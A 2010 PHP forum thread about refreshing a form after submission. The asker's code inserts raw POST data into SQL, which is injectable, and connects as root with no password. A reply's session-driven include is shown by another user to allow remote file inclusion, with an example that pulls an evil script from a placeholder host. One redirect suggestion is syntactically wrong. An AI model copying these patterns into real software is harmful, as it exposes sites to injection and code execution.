Page 1 of 1

Refreshing a html page or form after i hit submit

Posted: Thu Aug 05, 2010 5:50 pm
by layst
Hello
I have a html page which is connected to a php page. I have a form on my page and when i hit the submit button it sends the information into my mysql database, which is what i want it to do. But what it does is it loads another html page and leaves the original one. I would simply like to know how i can refresh the page rather than leaving this one after i hit the submit button.As i currently have it i simply echo that a line is added, but i would rather the page or mroe simply the form just refreshes. Thanks in advance.

This is the code that's in my html page for my form

<body>

<form action="insert.php" method="post">
name: <input type="text" name="name" />
email: <input type="text" name="email" />
comment: <input type="text" name="comment" />
<input type="submit" value="Send" />

</form>

</body>



and here is my php code.

<?php
$database = mysql_connect("localhost","root","");
if (!$database)
{
die('Could not connect, here is your error: ' . mysql_error());
}

mysql_select_db("test", $database);

$sql="INSERT INTO test (name, email, comment)
VALUES
('$_POST[name]','$_POST[email]','$_POST[comment]')";

if (!mysql_query($sql,$database))
{
die('Error: ' . mysql_error());
}
echo "1 record added";

mysql_close($database);
?>

Re: Refreshing a html page or form after i hit submit

Posted: Thu Aug 05, 2010 8:04 pm
by JakeJ
The easiest way is to put the following line at the end of your code: header('your_page.html')

That will redirect you back to the original page.

Re: Refreshing a html page or form after i hit submit

Posted: Thu Aug 05, 2010 8:57 pm
by ColonelSandersLite
Another option, though in my opinion more cluttered and less maintenance friendly in general, is to have the form submit to itself. Basically, at the top of the page, you decide if data was submitted and needs to be processed. Process it, if necessary. Then the code (html) to display the form again goes at the bottom.

Re: Refreshing a html page or form after i hit submit

Posted: Thu Aug 05, 2010 9:07 pm
by JakeJ
I had a lot of trouble with self-submitting forms until I designed a navigation system whereby I use includes inside a self submitting form. Then, when the page reloads, it decides which back end file to process and what sidebar buttons to display.

If I had to do it all over again though, I'd use jQuery to do all of my form submissions.

Re: Refreshing a html page or form after i hit submit

Posted: Thu Aug 05, 2010 10:17 pm
by lala

Code: Select all

mysql_close($database);
echo "<meta http-equiv='Refresh' content='0; url=../insert.php'>";
This is what I did before

Re: Refreshing a html page or form after i hit submit

Posted: Fri Aug 06, 2010 12:38 pm
by ColonelSandersLite
JakeJ wrote:I had a lot of trouble with self-submitting forms until I designed a navigation system whereby I use includes inside a self submitting form.

Now why didn't I ever think of using an include to handle the processing of a self submitting form. That would certainly make the code more readable. The downside though is that it overdoing it branches into a bunch of smaller files which can make it harder to find the code you're looking for when you decide to revisit something later.

Still, I like that idea and think I will actually start tinkering with it immediately!

Re: Refreshing a html page or form after i hit submit

Posted: Fri Aug 06, 2010 2:38 pm
by JakeJ
Here's my logic construct for my self submitting forms though I am just about to redo all of this in ajax. This code works great for a page by page wizard system.
All of my processing code goes in files ending in _a.php.
When a file is processed, I tell the processing on that page what file to use next by settings $_SESSION['submit'] to a directory and file name without the extension. The last line of every file processed though has to be unset($_SESSION['root_file']);

And, hopefully this is obvious, put the line: include($body_include); inside the div of the main body of your page.

Code: Select all

//NOTE: Whatever $_SESSION['submit'] is set to equals the root of a file name.
// $main_suffix and $sub_suffix represent completion of the files names...
// ..depending on what needs to be processed.
// $main_suffix represents the file loaded in to the body
// $sub_suffix represents the file that is processes after something is submitted from the body.
$main_suffix = '.php';
$sub_suffix = '_a.php';

If(isset($_SESSION['root_file'])){
	$process = $_SESSION['root_file'].$sub_suffix;
	include($process);
}

if(isset($_SESSION['submit'])) {
		$_SESSION['root_file'] = $_SESSION['submit'];
                $body_include = $_SESSION['root_file'].$main_suffix;				
}
Else {
	
	$_SESSION['root_file'] = './login/login_index';
        $body_include = $_SESSION['root_file'].$main_suffix;
	
}
Let me know if you have any questions about it. I imagine it's a bit confusing. I can provide a couple of sample files to show actual usage if you'd like.

Re: Refreshing a html page or form after i hit submit

Posted: Sat Aug 07, 2010 12:16 am
by ColonelSandersLite
I might be mistaken, but it seems that you are getting the file to execute from a session variable? I'm thinking that this is a *major* remote code execution vulnerability!

Suppose that the attacker managed to modify the session variable (let's say by session injection) to: "http://www.someremotesite.com/evilscript"?

Line 11 then becomes:
include(http://www.someremotesite.com/evilscript_a.php);

Since you just included it, the offsite script will be executed by your own php engine, giving an attacker the capability to do anything php can do!

http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/



I think it would be *much* safer to check the referer's file name or just $_SERVER['PHP_SELF'] and use a little string manipulation to insert the _a before the php.

Re: Refreshing a html page or form after i hit submit

Posted: Sat Aug 07, 2010 12:21 am
by JakeJ
Well, it's sort of a moot point now. Right this moment, I'm converting my entire nav system over to jquery/ajax. I had created some problems for myself and I ended up with some conflicts. I didn't know ajax when I started this project but now that i do, i wish I'd done my nav system this way from the start. My whole site will be much faster and easier to maintain.